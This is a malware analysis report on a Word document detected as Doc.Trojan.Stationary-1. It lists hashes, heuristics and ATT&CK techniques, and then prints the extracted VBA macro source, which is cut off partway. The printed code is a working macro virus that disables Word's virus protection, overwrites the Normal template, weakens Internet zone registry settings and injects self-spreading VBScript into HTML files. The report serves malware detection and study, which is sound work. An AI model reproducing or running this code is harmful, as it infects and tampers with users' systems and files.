Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 17e0466521a0a001…

MALICIOUS

Office (OLE)

40.5 KB Created: 2000-07-18 04:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b596834641c423f5f9e9e3ecd2817b22 SHA-1: b43785f18694ce98a97b3f0346861685f816f8c8 SHA-256: 17e0466521a0a001ed893d8f307322040f5a57bc4bbb88bfed72f347d10d63f1
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros that attempt to infect HTML files and modify registry settings. The macro code includes calls to `CreateObject` and `GetObject`, indicative of malicious activity. The script also attempts to write to registry keys related to 'Stationery' and Internet settings, suggesting an attempt to establish persistence or modify system behavior. The ClamAV detection of 'Doc.Trojan.Stationary-1' further supports the malicious nature of the file.

Heuristics 4

  • ClamAV: Doc.Trojan.Stationary-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Stationary-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22877 bytes
SHA-256: 912b399dc2c047a0fa40c074ad8798d348fadc043f5eb9df35c0efb435047c2e
Detection
ClamAV: Doc.Trojan.Stationary-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Stationery
'v1.2, Residency :)
'by CyberShadow//SMF
Private Sub Document_Close()
 With Application
  .EnableCancelKey = False
  .ScreenUpdating = False
  .ShowVisualBasicEditor = False
 End With
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 If NT.Lines(1, 1) <> "'Stationery" Then
  NT.DeleteLines 1, NT.CountOfLines
  NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
 End If
 If AD.Lines(1, 1) <> "'Stationery" Then
  AD.DeleteLines 1, AD.CountOfLines
  AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
 End If
 CrStr = getname()
 Call compile(CryptedString, CrStr)
 Call CorrectLine(CryptedString, CrStr)
 a = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\Stationery", "Stationery Folder") + "\"
 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = ""
 System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = ""
 Call infectHTML(a, CryptedString, CrStr)
End Sub
Private Sub infectHTML(a, CryptedString, CrStr)
 With Application.FileSearch
  .FileName = "*.htm"
  .MatchAllWordForms = True
  .LookIn = a
  .SearchSubFolders = True
  .Execute
  For i = 1 To .FoundFiles.Count
   c = .FoundFiles(i)
   Open c For Input As 1
    If LOF(1) > 55000 Then GoTo ExitRead
    e = ""
    Do While Not EOF(1)
     Line Input #1, a2
     d = a2
     If Len(d) >= 3 Then
      b = UCase(d)
      If b = "<HTML> <CYBERSHADOW...>" Then GoTo ExitRead
      If b = "<HTML>" Then b = "<html> <CyberShadow...>": d = b
      For j = 1 To Len(b) - 6
       If Mid$(b, j, 8) = "</BODY>" Then
        d = Left$(b, j + 7) + Chr$(13) + Chr$(10)
        d = d + "<body>" + Chr$(13) + Chr$(10)
        d = d + "<script language=""VBScript"">" + Chr$(13) + Chr$(10)
        d = d + "<!--" + Chr$(13) + Chr$(10)
        d = d + "On Error Resume Next" + Chr$(13) + Chr$(10)
        d = d + CryptedString + Chr$(13) + Chr$(10)
        d = d + "Dim FSO" + Chr$(13) + Chr$(10)
        d = d + "Set FSO = CreateObject(""Scripting.FileSystemObject"")" + Chr$(13) + Chr$(10)
        d = d + "Set WordObj = GetObject("""", ""Word.Application""): Quit = 0" + Chr$(13) + Chr$(10)
        d = d + "If WordObj = """" Then" + Chr$(13) + Chr$(10)
        d = d + "Set WordObj = CreateObject(""Word.Application""): Quit = 1" + Chr$(13) + Chr$(10)
        d = d + "End If" + Chr$(13) + Chr$(10)
        d = d + "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).Codemodule" + Chr$(13) + Chr$(10)
        d = d + "If NT.Lines(1, 1) <> ""'Stationery"" Then" + Chr$(13) + Chr$(10)
        d = d + "WordObj.Options.SaveNormalPrompt = False" + Chr$(13) + Chr$(10)
        d = d + "NT.DeleteLines 1, NT.CountOfLines" + Chr$(13) + Chr$(10)
        d = d + "NT.InsertLines 1," + CrStr + Chr$(13) + Chr$(10)
        d = d + "End If" + Chr$(13) + Chr$(10)
        d = d + "Set NT = Nothing" + Chr$(13) + Chr$(10)
        d = d + "If Quit = 1 Then WordObj.Quit" + Chr$(13) + Chr$(10)
        d = d + "--></script>" + Chr$(13) + Chr$(10)
        d = d + "</body>" + Chr$(13) + Chr$(10)
        j = j + 7
        If (Len(b) - j - 7) > 0 Then d = d + Right$(b, Len(b) - j - 7)
       End If
      Next
     End If
     e = e + d + Chr$(13) + Chr$(10)
    Loop
    Close #1
    Open c For Output As 1
     Print #1, e
     identities = System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities", "Default User ID")
     System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\" + identities + "\Software\Microsoft\Outlook Expres
... (truncated)